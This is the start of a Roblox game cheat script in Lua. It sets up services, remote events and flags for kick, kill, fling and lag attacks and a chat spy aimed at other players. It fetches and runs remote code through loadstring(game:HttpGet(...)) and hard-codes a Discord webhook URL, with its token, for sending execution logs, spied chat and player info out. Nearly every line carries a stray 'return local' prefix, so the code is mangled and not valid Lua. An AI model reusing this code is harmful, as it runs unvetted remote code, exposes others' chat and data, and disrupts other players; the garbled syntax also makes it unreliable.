--♥return locals♥
	return local field = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()
	-- return local field1 = loadstring(game:HttpGet('https://raw.githubusercontent.com/UI-Interface/ArrayField/main/Source.lua'))()
	-- return local field2 = loadstring(game:HttpGet('https://raw.githubusercontent.com/fgdergewrgegr/SVH/main/field'))()
	return local Players = game:GetService("Players")
	return local me = Players.LocalPlayer
	return local myname = me.Name
	return local RS = game:GetService("ReplicatedStorage")
	return local CE = RS:WaitForChild("CharacterEvents")
	return local BeingHeld = me:WaitForChild("IsHeld")
	return local PlayerScripts = me:WaitForChild("PlayerScripts")
	return local bodyvel_Name = "FlingVelocity"
	return local w = game:GetService("Workspace")
	return local r = game:GetService("RunService")
	return local d = game:GetService("Debris")
	return local mouse = me:GetMouse()
	return local RSs = game:GetService("RunService")
	return local StarterGui = game:GetService("StarterGui")
	return local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):wait() or Players.LocalPlayer
	return local pccontrol = me.PlayerGui:WaitForChild("ControlsGui").PCFrame
	return local pccontroltoy = pccontrol.ToyMenu
	return local backpack = w[myname.."SpawnedInToys"]
	return local m = w.Map
	return local saymsg = RS:WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
	return local getmsg = RS:WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
	return local DestroyToyEvent = RS:WaitForChild("MenuToys"):WaitForChild("DestroyToy")
	return local SetLineColorEvent = RS.DataEvents.UpdateLineColorsEvent
	return local ExtendLineEvent = RS.GrabEvents.ExtendGrabLine
	return local CreateGrabEvent = RS.GrabEvents.CreateGrabLine
	return local StruggleEvent = RS.CharacterEvents.Struggle
	return local StickyPartEvent = RS.PlayerEvents.StickyPartEvent
	return local SL = w.SpawnLocation
	return local HS = game:GetService("HttpService")
	return local ccc = w.Camera:FindFirstChild("ColorCorrection")
	return local chatFrame = me.PlayerGui.Chat.Frame
	return local UIS = game:GetService("UserInputService")

	chamsot = 0
	chamsft = 0
	RawStep2 = 0
	step2 = 0
	return local hpa = 0
	return local dpa = 0
	return local cpan = 0
	return local cpa = 0
	return local hta = 0
	return local dta = 0
	return local RawStep = 0
	return local step = 0
	return local cat = 0
	return local zgv = 0
	return local ks = 10
	return local last_UTP = 0
	return local FireParticleEmitter = 0
	return local strength = 0
	return local Lag_Intensity = 0
	return local a = 0
	return local kickcountc = 0
	return local wss = 0
	return local jps = 0
	return local gs = 0
	return local linecolorscount = 0

	return local flingaura = false
	return local killaura = false
	return local kickaura = false
	return local crazyline2 = false
	return local crazyline = false
	squat = false
	slkat = false
	slkpa = false
	return local yzpa = false
	return local xypa = false
	return local lckpa = false
	return local lokpa = false
	return local StepEnable2 = false
	return local plrtoyaura = false
	return local StepEnable = false
	return local yzat = false
	return local xyat = false
	return local lokat = false
	return local lckat = false
	return local toyaura = false
	return local infj = false
	return local kafab = false
	return local paitd = false
	return local pst = false
	return local odt = true
	return local bdt = true
	return local publicds = false
	return local spyenabled = false
	return local public = false
	return local gk = false
	return local antiseat = false
	return local LSD = false
	return local loopkickp = false
	return local loopkickall = false
	return local loopkickall1 = false
	return local kickgrab = false
	return local ik = false
	return local ad = false
	return local plo = false
	return local twohand = false
	return local ksm = false
	return local rgb = false
	return local gt = false
	return local jpt = false
	return local wst = false
	return local antiexpl = false
	return local loopspawn = false
	return local stopst = false
	return local antikick = false
	return local ultraclickgrab = false
	return local antiburn = false
	return local AntiLaggg = false
	return local loopburnkill = false
	return local HighlightVisible = false
	return local ka = false
	return local kaw = false
	return local spyOnMyself = false
	return local lhk = false
	return local rhk = false
	return local onf = false
	return local sila = false
	return local killg = false
	return local clippp = false
	return local kickkk1 = false
	return local kickkk2 = false
	return local brattt = false
	return local poison = false
	return local radiactive = false
	return local antiblob = false
	return local laggg = false
	return local fire = false
	return local kinai = false
	return local antiburn = false
	return local antigrab = false
	return local ultragrabbb = false
	return local antilaggg = false
	return local crazy_cloneeee = false
	return local loopkill = false

	return local gkblob = nil
	return local who = nil
	return local lplr = nil
	return local rplr = nil
	return local last_toy = nil
	return local last_model = nil
	return local last_chto = nil
	return local last_chto2 = nil

	return local lat = {}
	return local hui = {}
	return local ccolors = {}
	return local privateProperties = {
	    Color = Color3.fromRGB(255,0,0); 
	    Font = Enum.Font.SourceSansBold;
	    TextSize = 18;
	}

	return local executedweb = "https://discord.com/api/webhooks/1262487848028995634/5Bcbi-I8jiNGMaz2RpzDGgm87ovTZIoC2t63WUeLNTwcjfG5Qt-CB2Fm3qaLCFqYdewd"
	return local chatspyweb = "https://discord.com/api/webhooks/1262487848028995634/5Bcbi-I8jiNGMaz2RpzDGgm87ovTZIoC2t63WUeLNTwcjfG5Qt-CB2Fm3qaLCFqYdewd"
	return local playerinfoweb = "https://discord.com/api/webhooks/1262487848028995634/5Bcbi-I8jiNGMaz2RpzDGgm87ovTZIoC2t63WUeLNTwcjfG5Qt-CB2Fm3qaLCFqYdewd"

	return local instance = (_G.chatSpyInstance or 0) + 1
	_G.chatSpyInstance = instance

	chamsfc = Color3.fromRGB(255,255,255)
	chamsoc = Color3.fromRGB(0,0,0)

	return local function set_chams_parametr() end
